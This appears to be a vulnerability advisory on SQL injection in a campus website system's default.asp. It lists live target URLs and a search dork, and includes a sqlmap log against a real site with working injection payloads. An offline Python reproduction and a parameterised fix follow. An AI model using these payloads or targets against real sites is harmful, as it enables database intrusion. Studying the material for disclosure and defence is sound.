Multiple SQL injection vulnerabilities in a single file of a campus website-building system

2015-03-23T00:00:00
ID SSV:95852
Type seebug
Reporter Root
Modified 2015-03-23T00:00:00

Description

Brief description:

sql

Detailed description:

The system is very widely deployed. Example installations:

http://www.dlwsxx.com/ws2004/model/login1.asp
http://www.fzjcxx.cn/ws2004/model/login1.asp
http://www.nxyancgjzx.com/ws2004/model/login1.asp
http://www.sgtjb.com/ws2004/model/login1.asp
http://www.sdwhys.com/ws2004/model/login1.asp
http://www.zjnksyzx.com:8801/ws2004/model/login1.asp

Search keyword (dork): inurl:ws2004/Model/

The vulnerable file is ws2004/Model/default.asp. Of its four GET parameters, sqlmap confirmed two as injectable: KeyWord (a single-quoted string context, with boolean-based blind, UNION, stacked-query and time-based techniques) and TemplateFields (an unescaped numeric context, boolean-based blind). TemplateFunctionMode and SearchType were not found injectable. Test URL:

http://www.fzjcxx.cn/ws2004/Model/default.asp?KeyWord=1&TemplateFunctionMode=32&TemplateFields=1&SearchType=0

```
[22:27:15] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as the output directory
[22:27:16] [INFO] testing connection to the target URL
[22:27:16] [INFO] testing if the target URL is stable. This can take a couple of seconds
[22:27:17] [INFO] target URL is stable
[22:27:17] [INFO] testing if GET parameter 'KeyWord' is dynamic
[22:27:17] [INFO] confirming that GET parameter 'KeyWord' is dynamic
[22:27:17] [INFO] GET parameter 'KeyWord' is dynamic
[22:27:17] [WARNING] heuristic (basic) test shows that GET parameter 'KeyWord' might not be injectable
[22:27:17] [INFO] testing for SQL injection on GET parameter 'KeyWord'
[22:27:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:27:19] [INFO] GET parameter 'KeyWord' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:27:20] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] y
[22:27:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:27:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:27:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:27:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[22:27:49] [INFO] testing 'MySQL inline queries'
[22:27:49] [INFO] testing 'PostgreSQL inline queries'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:27:49] [INFO] testing 'Oracle inline queries'
[22:27:49] [INFO] testing 'SQLite inline queries'
[22:27:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:27:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:28:50] [INFO] GET parameter 'KeyWord' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable
[22:28:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:28:50] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[22:28:51] [INFO] GET parameter 'KeyWord' seems to be 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' injectable
[22:28:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:28:51] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:28:51] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:28:52] [INFO] target URL appears to have 2 columns in query
[22:28:52] [WARNING] reflective value(s) found and filtering out
[22:28:52] [WARNING] output with limited number of rows detected. Switching to partial mode
[22:28:52] [INFO] GET parameter 'KeyWord' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'KeyWord' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[22:29:03] [INFO] testing if GET parameter 'TemplateFunctionMode' is dynamic
[22:29:03] [INFO] confirming that GET parameter 'TemplateFunctionMode' is dynamic
[22:29:03] [INFO] GET parameter 'TemplateFunctionMode' is dynamic
[22:29:04] [WARNING] heuristic (basic) test shows that GET parameter 'TemplateFunctionMode' might not be injectable
[22:29:04] [INFO] testing for SQL injection on GET parameter 'TemplateFunctionMode'
[22:29:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:29:05] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[22:29:06] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[22:29:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[22:29:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:29:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:29:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:29:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:29:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[22:29:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[22:29:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[22:29:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[22:29:43] [INFO] testing 'MySQL inline queries'
[22:29:44] [INFO] testing 'PostgreSQL inline queries'
[22:29:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:29:44] [INFO] testing 'Oracle inline queries'
[22:29:44] [INFO] testing 'SQLite inline queries'
[22:29:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:29:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:29:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:29:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:29:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[22:29:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:29:48] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[22:29:49] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[22:29:49] [INFO] testing 'Oracle AND time-based blind'
[22:29:50] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)'
[22:29:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[22:29:55] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
[22:29:57] [INFO] testing 'Generic UNION query (43) - 1 to 10 columns'
[22:29:59] [WARNING] GET parameter 'TemplateFunctionMode' is not injectable
[22:29:59] [INFO] testing if GET parameter 'TemplateFields' is dynamic
[22:30:00] [INFO] confirming that GET parameter 'TemplateFields' is dynamic
[22:30:00] [INFO] GET parameter 'TemplateFields' is dynamic
[22:30:00] [INFO] heuristic (basic) test shows that GET parameter 'TemplateFields' might be injectable
[22:30:00] [INFO] testing for SQL injection on GET parameter 'TemplateFields'
[22:30:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[22:30:02] [INFO] GET parameter 'TemplateFields' seems to be 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' injectable
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)'
[22:30:05] [INFO] testing 'Generic UNION query (43) - 1 to 20 columns'
[22:30:05] [INFO] checking if the injection point on GET parameter 'TemplateFields' is a false positive
GET parameter 'TemplateFields' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[22:30:07] [INFO] testing if GET parameter 'SearchType' is dynamic
[22:30:08] [WARNING] GET parameter 'SearchType' does not appear dynamic
[22:30:08] [WARNING] heuristic (basic) test shows that GET parameter 'SearchType' might not be injectable
[22:30:08] [INFO] testing for SQL injection on GET parameter 'SearchType'
[22:30:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:30:09] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[22:30:09] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[22:30:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[22:30:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:30:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:30:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:30:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:30:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[22:30:15] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[22:30:15] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[22:30:16] [INFO] testing 'MySQL inline queries'
[22:30:17] [INFO] testing 'PostgreSQL inline queries'
[22:30:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:30:17] [INFO] testing 'Oracle inline queries'
[22:30:17] [INFO] testing 'SQLite inline queries'
[22:30:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:30:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:30:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:30:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:30:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[22:30:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:30:21] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[22:30:22] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[22:30:22] [INFO] testing 'Oracle AND time-based blind'
[22:30:23] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)'
[22:30:24] [INFO] testing 'MySQL UNION query (43) - 1 to 10 columns'
[22:30:27] [INFO] testing 'Generic UNION query (43) - 1 to 10 columns'
[22:30:29] [WARNING] GET parameter 'SearchType' is not injectable
sqlmap identified the following injection points with a total of 483 HTTP(s) requests:

Place: GET
Parameter: KeyWord
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: KeyWord=1' AND 8355=8355 AND 'pMth'='pMth&TemplateFunctionMode=32&TemplateFields=1&SearchType=0

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: KeyWord=1' UNION ALL SELECT NULL,CHAR(113)+CHAR(121)+CHAR(120)+CHAR(120)+CHAR(113)+CHAR(84)+CHAR(115)+CHAR(100)+CHAR(109)+CHAR(90)+CHAR(83)+CHAR(99)+CHAR(77)+CHAR(122)+CHAR(71)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)-- &TemplateFunctionMode=32&TemplateFields=1&SearchType=0

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: KeyWord=1'; WAITFOR DELAY '0:0:5'--&TemplateFunctionMode=32&TemplateFields=1&SearchType=0

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: KeyWord=1' AND 7937=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'MUme'='MUme&TemplateFunctionMode=32&TemplateFields=1&SearchType=0

Place: GET
Parameter: TemplateFields
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
    Payload: KeyWord=1&TemplateFunctionMode=32&TemplateFields=(SELECT (CASE WHEN (6562=6562) THEN 1 ELSE 6562*(SELECT 6562 FROM master..sysdatabases) END))&SearchType=0

there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: KeyWord, type: Single quoted string (default)
[1] place: GET, parameter: TemplateFields, type: Unescaped numeric
[q] Quit
>
[22:30:32] [INFO] testing Microsoft SQL Server
[22:30:32] [INFO] confirming Microsoft SQL Server
[22:30:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[22:30:32] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.fzjcxx.cn'

[*] shutting down at 22:30:32
```
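The two injection contexts sqlmap reports above ('Single quoted string' for KeyWord, 'Unescaped numeric' for TemplateFields) can be reproduced offline. The following Python is an added example, not code from the ws2004 product or from the original report. It rebuilds the string-concatenation pattern the findings imply against a constructed SQLite table (the table, column names and rows are invented, and SQLite stands in for SQL Server 2000, so the page's error-raising ELSE branch `6562*(SELECT 6562 FROM master..sysdatabases)` is replaced by a plain boolean CASE that behaves the same way for a blind test), runs the baseline/TRUE/FALSE differential that underlies a boolean-based blind verdict, and shows the parameterised, type-checked form that closes both points.

```python
"""
Added example: the two injection contexts from the sqlmap report, reproduced
against a constructed SQLite table. Schema, rows and the query shape are
assumptions; the real ws2004 source is not on the page.
"""
import sqlite3
from typing import List, Optional, Tuple

Params = Tuple[str, str]  # (KeyWord, TemplateFields) as they arrive in the query string


def make_db() -> sqlite3.Connection:
    # Constructed sample data, not the application's real schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, tag TEXT, fields INTEGER)")
    db.executemany(
        "INSERT INTO article (tag, fields) VALUES (?, ?)",
        [("1", 1), ("1", 1), ("news", 1), ("1", 2)],
    )
    return db


def vulnerable_sql(keyword: str, template_fields: str) -> str:
    # The concatenation pattern sqlmap's verdicts imply (assumed): KeyWord is
    # dropped between single quotes, TemplateFields is pasted in bare as a number.
    return (
        "SELECT id, tag FROM article WHERE tag = '" + keyword + "'"
        " AND fields = " + template_fields
    )


def run_vulnerable(db: sqlite3.Connection, keyword: str, template_fields: str) -> List[int]:
    return [row[0] for row in db.execute(vulnerable_sql(keyword, template_fields))]


def boolean_blind_confirmed(db: sqlite3.Connection, baseline: Params,
                            true_case: Params, false_case: Params) -> bool:
    """The differential behind a 'boolean-based blind' verdict: a payload whose
    injected condition is TRUE must reproduce the baseline result, and the same
    payload with a FALSE condition must change it."""
    base = run_vulnerable(db, *baseline)
    return (run_vulnerable(db, *true_case) == base
            and run_vulnerable(db, *false_case) != base)


# Payloads in the shape sqlmap printed, one pair per context.
BASELINE: Params = ("1", "1")
KEYWORD_TRUE: Params = ("1' AND 8355=8355 AND 'pMth'='pMth", "1")
KEYWORD_FALSE: Params = ("1' AND 8355=8356 AND 'pMth'='pMth", "1")
# SQLite does not raise on a multi-row scalar subquery the way SQL Server does,
# so the ELSE branch is a plain 0 here instead of the page's error-inducing form.
FIELDS_TRUE: Params = ("1", "(SELECT (CASE WHEN (6562=6562) THEN 1 ELSE 0 END))")
FIELDS_FALSE: Params = ("1", "(SELECT (CASE WHEN (6562=6563) THEN 1 ELSE 0 END))")


def safe_query(db: sqlite3.Connection, keyword: str,
               template_fields: str) -> Optional[List[int]]:
    """Hardened form: bind the string, type-check the number.
    Escaping quotes alone would not fix TemplateFields, because that value is
    never inside quotes to begin with; only a type check or a bound integer
    parameter removes the numeric injection point."""
    try:
        fields = int(template_fields)
    except ValueError:
        return None  # caller answers 400; no query is built
    return [row[0] for row in db.execute(
        "SELECT id, tag FROM article WHERE tag = ? AND fields = ?", (keyword, fields))]


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_sql(*KEYWORD_TRUE))
    print(vulnerable_sql(*FIELDS_TRUE))
    print("KeyWord blind confirmed:", boolean_blind_confirmed(db, BASELINE, KEYWORD_TRUE, KEYWORD_FALSE))
    print("TemplateFields blind confirmed:", boolean_blind_confirmed(db, BASELINE, FIELDS_TRUE, FIELDS_FALSE))
    print("safe query, KeyWord payload as data:", safe_query(db, *KEYWORD_TRUE))
    print("safe query, TemplateFields payload rejected:", safe_query(db, *FIELDS_TRUE))
```

The stacked-query (`WAITFOR DELAY`) and heavy-query time-based variants sqlmap also confirmed are not modelled: sqlite3's `execute()` runs a single statement, whereas the ASP/ADO path on the real target evidently passed the whole string through as a batch. The differential above is the cheap manual check to run before pointing sqlmap at a host, since three requests (baseline, TRUE, FALSE) are enough to tell an injectable parameter from a merely dynamic one.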

Proof of vulnerability: